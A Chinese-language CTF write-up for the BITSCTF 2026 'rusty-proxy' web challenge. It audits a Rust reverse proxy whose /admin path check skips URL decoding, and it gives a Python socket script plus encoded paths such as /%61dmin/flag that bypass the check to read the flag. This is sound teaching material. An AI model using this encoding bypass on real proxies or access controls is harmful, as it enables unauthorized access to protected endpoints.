【CTF-WEB-代码审计】URL编码绕过路经检查访问flag页面,admin编码为%61%64min
题目BITSCTF 2026\题目\WEB\rusty-proxyrusty-proxyI just vibecoded a highly secure reverse proxy using rust, I hope it works properly.http://chals.bitskrieg.in:25001解题思路访问网站http://chals.bitskrieg.in:25001http://chals.bitskrieg.in:25001/api/status问题分析题目要求我们分析一个用Rust编写的反向代理服务器rusty-proxy并找到其中的安全漏洞从而获取后端服务器的flag。提供的代码结构如下proxy/src/main.rsRust编写的反向代理服务器代码backend/server.pyPython编写的后端服务器代码docker-compose.ymlDocker Compose配置文件代码审计1. 后端服务器分析首先查看后端服务器的代码backend/server.pyfromflaskimportFlask,jsonify,requestimportcheroot.wsgiimportos appFlask(__name__)FLAGos.getenv(FLAG,BITSCTF{fake_flag})app.route(/,methods[GET,POST])defindex():ifrequest.methodPOST:_request.get_data()returnjsonify({version:1.0.0,endpoints:[/,/api/status],})app.route(/api/status)defstatus():returnjsonify({status:running,uptime:operational,})app.route(/admin/flag)defvault():returnjsonify({flag:FLAG})if__name____main__:bind_addr(0.0.0.0,8080)servercheroot.wsgi.Server(bind_addr,app)print(fBackend running on{bind_addr[0]}:{bind_addr[1]})try:server.start()exceptKeyboardInterrupt:server.stop()从后端代码可以看出后端是一个Flask应用运行在8080端口提供了三个端点/返回版本信息和可用端点/api/status返回服务器状态/admin/flag返回flag这是我们的目标直接访问/admin/flag无法获取到flag2. 反向代理服务器分析接下来查看反向代理服务器的代码proxy/src/main.rs2.1 路径检查函数fnis_path_allowed(path:str)-bool{letnormalizedpath.to_lowercase();ifnormalized.starts_with(/admin){returnfalse;}true}这个函数负责检查请求路径是否允许访问。它将路径转换为小写然后检查是否以/admin开头如果是则返回false拒绝访问。2.2 请求解析函数asyncfnparse_request(reader:mutBufReadertokio::io::ReadHalfTcpStream,)-ResultOptionRequestMeta,staticstr{// ... 解析请求行 ...lettrimmed_linerequest_line.trim_end().to_string();letparts:Vecstrtrimmed_line.splitn(3, ).collect();ifparts.len()!3{returnErr(malformed request-line);}letmethodparts[0].to_string();letpathparts[1].to_string();letversionparts[2].to_string();// ... 解析请求头 ...Ok(Some(RequestMeta{method,path,version,headers,is_chunked,content_length,client_wants_close,}))}这个函数负责解析HTTP请求从请求行中提取方法、路径和版本。注意它直接将路径存储到RequestMeta结构中没有进行任何URL解码。2.3 客户端处理函数asyncfnhandle_client(client:TcpStream,pool:ArcConnPool){let(read_half,mutwrite_half)tokio::io::split(client);letmutreaderBufReader::new(read_half);loop{letmetamatchparse_request(mutreader).await{Ok(Some(m))m,Ok(None)break,Err(msg){let_send_error(mutwrite_half,400 Bad Request,msg).await;break;}};letclose_aftermeta.client_wants_close;if!is_path_allowed(meta.path){let_send_error(mutwrite_half,403 Forbidden,Access denied.\n).await;break;}// ... 连接后端服务器 ...letmutheadformat!({} {} {}\r\n,meta.method,meta.path,meta.version);for(k,v)inmeta.headers{head.push_str(format!({}: {}\r\n,k,v));}head.push_str(\r\n);// ... 发送请求到后端服务器 ...}}这个函数负责处理客户端请求解析HTTP请求获取请求元数据调用is_path_allowed函数检查路径是否允许访问如果允许访问将原始路径传递给后端服务器漏洞发现在分析代码后我发现了一个潜在的安全漏洞is_path_allowed函数没有对路径进行URL解码。这意味着如果路径是URL编码的比如/%61dmin/flag那么path.to_lowercase()会将其转换为/%61dmin/flag因为URL编码的部分是大写的然后检查是否以/admin开头这显然不会匹配所以会返回true允许访问代理服务器会将原始的URL编码路径传递给后端服务器后端服务器Flask应用会自动对URL进行解码将其解码为/admin/flag然后返回flag漏洞利用测试1使用URL编码的路径代码访问importsocket# 创建socket连接socksocket.socket(socket.AF_INET,socket.SOCK_STREAM)sock.settimeout(5)sock.connect((chals.bitskrieg.in,25001))# 构建HTTP请求使用URL编码的路径# %61 是字符 a 的URL编码requestbGET /%61dmin/flag HTTP/1.1\r\nrequestbHost: chals.bitskrieg.in:25001\r\nrequestbConnection: close\r\nrequestb\r\n# 发送请求sock.sendall(request)# 接收响应responsebwhileTrue:try:datasock.recv(1024)ifnotdata:breakresponsedataexceptsocket.timeout:break# 关闭连接sock.close()print(response.decode())测试结果HTTP/1.1 200 OK Content-Type: application/json Content-Length: 55 Date: Sun, 22 Feb 2026 07:08:01 GMT Server: Cheroot/11.1.2 {flag:BITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}}成功获取到了flag直接访问http://chals.bitskrieg.in:25001/%61dmin/flag其他测试我还测试了其他几种URL编码方式都成功绕过了路径检查/%61%64min/flag只编码前两个字符/%61%64%6d%69%6e/flag编码整个admin字符串所有测试都成功获取到了flag。漏洞原理输入处理不当is_path_allowed函数没有对输入路径进行URL解码直接使用原始路径进行检查。信任用户输入函数信任用户提供的路径没有进行任何验证或转换。后端自动解码后端服务器Flask应用会自动对URL进行解码使得编码后的路径能够被正确解析。总结通过代码审计我发现了一个URL编码绕过漏洞利用这个漏洞成功获取了后端服务器的flag。这个漏洞的根本原因是is_path_allowed函数没有对路径进行URL解码导致攻击者可以通过发送URL编码的路径来绕过路径检查。最终flagBITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}

相关新闻

TI HTU模块安全机制与双缓冲配置实战解析

TI HTU模块安全机制与双缓冲配置实战解析

1. HTU模块核心功能与设计哲学解析在嵌入式系统,尤其是汽车电子和工业控制这类对实时性与可靠性要求严苛的领域,微控制器(MCU)内部的数据搬运效率与安全性直接决定了整个系统的成败。德州仪器(TI)的高端定时…

2026/7/23 20:01:27阅读更多 →
【CTF-WEN-PHP】phps查看源代码并用双重URL编码绕过,admin编码为%25%36%31%25%36%34%25%36%44%25%36%39%25%36%45

【CTF-WEN-PHP】phps查看源代码并用双重URL编码绕过,admin编码为%25%36%31%25%36%34%25%36%44%25%36%39%25%36%45

题目 攻防世界-WEB-PHP2 https://adworld.xctf.org.cn/challenges/list 解题 访问网址 http://61.147.171.105:64825/index.phps admin.split().map(c > % c.charCodeAt(0).toString(16).toUpperCase()).join()%61%64%6D%69%6E%61%64%6D%69%6E.split().map(c > % …

2026/7/23 19:59:27阅读更多 →
告别低效记录!免费又好用的语音转文字软件深度评测,准确率高达98.7%

告别低效记录!免费又好用的语音转文字软件深度评测,准确率高达98.7%

你是否也曾在冗长的会议后,面对堆积如山的录音文件感到头疼?是否在学生时代,为了一字不差地记下老师的板书和口述而手忙脚乱?又或者,作为一名内容创作者,需要将大量的视频、音频采访素材快速转化为文字&…

2026/7/23 19:59:27阅读更多 →
多模态大语言模型动态交互与效率优化研究

多模态大语言模型动态交互与效率优化研究

1. 多模态大语言模型(MLLMs)的现状与挑战在2023-2024年的AI领域爆发式发展中,多模态大语言模型(Multimodal Large Language Models, MLLMs)已成为最受关注的研究方向之一。这类模型通过融合视觉、语言等多种模态信息&a…

2026/7/23 21:23:31阅读更多 →
将AI代理嵌入移动应用:Streamlit集成实战

将AI代理嵌入移动应用:Streamlit集成实战

AI代理的消费方式:独立应用、业务触发与嵌入现有系统 构建完成的AI代理需要以合适的方式服务于终端用户。常见的消费方式有三种: 独立应用:代理作为一个独立运行的应用程序,用户直接与之交互。 业务触发:代理通过API或事件被其他系统调用,执行特定任务后返回结果。 嵌入…

2026/7/23 21:23:31阅读更多 →
【代码随想录算法训练营第33天】动态规划part02 |62.不同路径 | 343.整数拆分 | 96.不同的二叉搜索树

【代码随想录算法训练营第33天】动态规划part02 |62.不同路径 | 343.整数拆分 | 96.不同的二叉搜索树

文章目录KEY(1)语法1> 如何初始化有变量的数组:2> 三个数求最大值(2)想清楚问题建模了解二叉搜索树性质:62.不同路径整个代码:63. 不同路径 II (即有障碍版)整个代码:343.整数…

2026/7/23 21:23:31阅读更多 →
深入解析TI C6000 DSP EMIF HOLD/HOLDA总线仲裁时序设计与工程实践

深入解析TI C6000 DSP EMIF HOLD/HOLDA总线仲裁时序设计与工程实践

1. 项目概述与核心价值在嵌入式系统,尤其是基于德州仪器C6000系列这类高性能数字信号处理器的设计中,外部存储器接口(EMIF)是连接DSP核心与外部世界(如SDRAM、Flash、FPGA或ASIC)的关键桥梁。当系统中有多个…

2026/7/23 21:23:31阅读更多 →
TMS320C6418 DSP时序参数深度解析:从理论到硬件设计实践

TMS320C6418 DSP时序参数深度解析:从理论到硬件设计实践

1. 项目概述:为什么DSP时序参数是硬件设计的“生命线”在嵌入式系统,尤其是像TMS320C6418这样的高性能数字信号处理器设计中,我们常常把注意力集中在算法优化、内存带宽和CPU主频上。然而,一个项目能否稳定运行,往往取…

2026/7/23 21:23:31阅读更多 →
低bit量化与投机解码在大模型推理中的优化实践

低bit量化与投机解码在大模型推理中的优化实践

1. 项目背景与核心挑战 在AI大模型推理加速领域,低bit量化与投机解码(Speculative Decoding)是当前最受关注的两项关键技术。华为黄大年茶思屋第137期提出的这个课题,直指两者结合时的核心痛点——当我们将大模型权重压缩到4bit甚…

2026/7/23 21:21:31阅读更多 →
Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/23 0:56:31阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/23 0:56:31阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/23 0:56:31阅读更多 →
Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具 【免费下载链接】chitchatter Secure peer-to-peer chat that is serverless, decentralized, and ephemeral 项目地址: https://gitcode.com/gh_mirrors/ch/chitchatter Chitchatter是一款革命性的安…

2026/7/23 0:00:28阅读更多 →
从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

更多请点击: https://intelliparadigm.com 第一章:从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表) 当AI副业主理人不再仅满足于单次服务交付,而是主动构建可复用、可裂变、可…

2026/7/23 0:00:28阅读更多 →
油泥处理设备哪里能买到

油泥处理设备哪里能买到

油泥处理设备哪里有?这是许多从事油田、炼化、清罐业务的从业者最关心的问题。根据河南三丰环保设备有限公司的行业经验,选购油泥处理设备的核心在于设备能否适配当地环保法规与原料特性,而非单纯看价格。该公司总经理王钦田先生指出&#xf…

2026/7/23 0:00:28阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/22 22:56:18阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/23 18:58:18阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/23 18:58:18阅读更多 →